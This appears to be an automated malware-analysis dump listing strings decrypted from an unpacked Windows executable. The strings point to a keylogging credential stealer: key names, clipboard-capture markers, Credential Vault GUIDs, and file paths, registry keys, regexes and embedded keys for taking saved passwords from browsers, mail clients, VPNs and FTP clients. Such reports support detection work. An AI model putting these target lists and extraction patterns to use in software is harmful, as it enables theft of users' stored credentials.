Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {TAB}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {ESC}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {Win}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {CAPSLOCK}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {KEYUP}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {KEYDOWN}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {KEYLEFT}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {KEYRIGHT}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {DEL}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {END}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {HOME}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {Insert}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {NumLock}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {PageDown}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {PageUp}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {ENTER}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {F1}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {F2}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {F3}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {F4}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {F5}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {F6}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {F7}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {F8}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {F9}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {F10}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {F11}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {F12}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: control
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {CTRL}
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: &
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: >
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: "
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <br><hr>Copied Text: <br>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <hr>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: logins
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: IE/Edge
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Windows Secure Note
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Windows Web Password Credential
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Windows Credential Picker Protector
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Web Credentials
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Windows Credentials
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Windows Domain Certificate Credential
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Windows Domain Password Credential
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Windows Extended Credential
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: 00000000-0000-0000-0000-000000000000
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SchemaId
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: pResourceElement
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: pIdentityElement
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: pPackageSid
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: pAuthenticatorElement
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: IE/Edge
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: UC Browser
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: UCBrowser\
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Login Data
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: journal
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: wow_logins
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Safari for Windows
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Apple Computer\Preferences\keychain.plist
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <array>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <dict>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <string>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: </string>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <string>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: </string>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <data>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: </data>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: -convert xml1 -s -o "
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \fixed_keychain.xml"
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Microsoft\Protect\
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: credential
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: QQ Browser
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Tencent\QQBrowser\User Data
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Default\EncryptedStorage
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Profile
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \EncryptedStorage
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: entries
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: category
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: str3
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: str2
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: blob0
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: password_value
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: IncrediMail
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: PopPassword
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SmtpPassword
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Software\IncrediMail\Identities\
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Accounts_New
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: PopPassword
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SmtpPassword
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SmtpServer
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: EmailAddress
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Eudora
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Software\Qualcomm\Eudora\CommandLine\
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: current
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Settings
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SavePasswordText
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Settings
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ReturnAddress
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Falkon Browser
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \falkon\profiles\
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: profiles.ini
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: startProfile=([A-z0-9\/\.\"]+)
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: profiles.ini
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \browsedata.db
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: autofill
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ClawsMail
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Claws-mail
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \clawsrc
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \clawsrc
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: passkey0
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: master_passphrase_salt=(.+)
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: master_passphrase_pbkdf2_rounds=(.+)
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \accountrc
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: smtp_server
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: address
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: account
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \passwordstorerc
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: {(.),(.)}(.*)
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Flock Browser
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: APPDATA
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Flock\Browser\
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: signons3.txt
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: DynDns
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Dyn\Updater\config.dyndns
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: username=
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: password=
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: https://account.dyn.com/
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: t6KzXhCh
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Dyn\Updater\daemon.cfg
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: global
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: accounts
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: account.
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: username
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: account.
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Psi/Psi+
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: name
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Psi/Psi+
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: APPDATA
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Psi\profiles
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: APPDATA
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Psi+\profiles
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \accounts.xml
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \accounts.xml
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: OpenVPN
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs\
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: username
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: auth-data
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: entropy
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: USERPROFILE
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \OpenVPN\config\
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: remote
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: remote
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: NordVPN
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: NordVPN
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: NordVpn.exe*
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: user.config
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: //setting[@name='Username']/value
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: //setting[@name='Password']/value
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: NordVPN
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Private Internet Access
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: %ProgramW6432%
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Private Internet Access\data
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Private Internet Access\data
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \account.json
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ."username":"(.?)"
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ."password":"(.?)"
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Private Internet Access
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: privateinternetaccess.com
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: FileZilla
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: APPDATA
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: APPDATA
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <Server>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <Host>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <Host>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: </Host>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <Port>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: </Port>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <User>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <User>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: </User>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: </Pass>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <Pass>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: </Pass>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: CoreFTP
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SOFTWARE\FTPWare\COREFTP\Sites
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: User
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Host
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Port
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: hdfzpysvpzimorhk
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: WinSCP
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: HostName
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: UserName
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: PublicKeyFile
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: PortNumber
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: [PRIVATE KEY LOCATION: "{0}"]
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: WinSCP
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ABCDEF
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Flash FXP
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: port
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: user
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: pass
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: quick.dat
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Sites.dat
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \FlashFXP\
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \FlashFXP\
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: FTP Navigator
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SystemDrive
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \FTP Navigator\Ftplist.txt
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Server
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: No Password
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: User
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SmartFTP
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: APPDATA
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: WS_FTP
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: appdata
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: HOST
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: PWD=
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: PWD=
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: FtpCommander
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SystemDrive
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SystemDrive
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: SystemDrive
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \cftp\Ftplist.txt
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ;Password=
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ;User=
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ;Server=
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ;Port=
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ;Port=
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ;Password=
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ;User=
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: ;Anonymous=
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: FTPGetter
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \FTPGetter\servers.xml
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <server>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <server_ip>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <server_ip>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: </server_ip>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <server_port>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: </server_port>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <server_user_name>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <server_user_name>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: </server_user_name>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <server_user_password>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: <server_user_password>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: </server_user_password>
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: FTPGetter
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: The Bat!
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: appdata
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \The Bat!
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Account.CFN
Source: 0.2.IUqsn1SBGy.exe.4b95b98.2.raw.unpack	String decryptor: \Account.CFN
